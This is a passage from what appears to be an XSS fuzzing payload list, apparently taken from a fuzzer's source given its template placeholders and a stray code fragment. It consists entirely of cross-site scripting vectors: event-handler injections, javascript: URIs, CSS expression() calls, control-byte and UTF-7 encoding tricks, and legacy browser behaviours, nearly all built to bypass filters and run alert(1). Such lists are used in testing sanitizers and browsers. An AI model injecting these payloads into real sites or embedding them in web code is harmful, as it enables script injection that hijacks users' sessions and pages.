onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html 